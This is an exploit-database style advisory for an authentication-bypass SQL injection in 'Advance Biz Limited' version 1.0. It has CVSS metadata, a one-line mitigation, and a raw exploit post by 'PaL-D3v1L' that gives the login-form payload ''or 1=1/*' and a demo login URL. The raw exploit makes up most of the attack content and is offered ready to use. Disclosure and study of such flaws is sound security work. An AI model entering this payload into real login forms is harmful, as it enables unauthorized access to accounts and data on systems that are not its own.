Advance Biz Limited - exploit.company

vendor:

by:

PaL-D3v1L

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name:

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Advance Biz Limited <= 1.0 (Auth Bypass) SQL injection Vulnerability

The vulnerability allows an attacker to bypass authentication by injecting a specific code.

Mitigation:

Implement input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

================================================== ============================

By : PaL-D3v1L

================================================== ============================

[»] Advance Biz Limited <= 1.0 ( Auth Bypass ) SQL injection Vulnerability

================================================== ============================

[»] Founder: [ PaL-D3v1L ]
[»] Gr44tz to: [ ReD-D3v1L ¡ Evil-Cod3r ¡ Sas-TerrOisT ¡ Shadow-DeviL ¡ Cyber-Err0r ¡ cold-z3ro ]
[»] Dork: [ n/a ]
[»]E-mail :security.code@hotmail.com
################################################## #########################

==[ SQL injection ]==

Write This Code : 'or 1=1/* <======= Now Control Bypassed


==[ Live Demo ]==

http://server/advance-biz/demo/login.php


################################################## #########################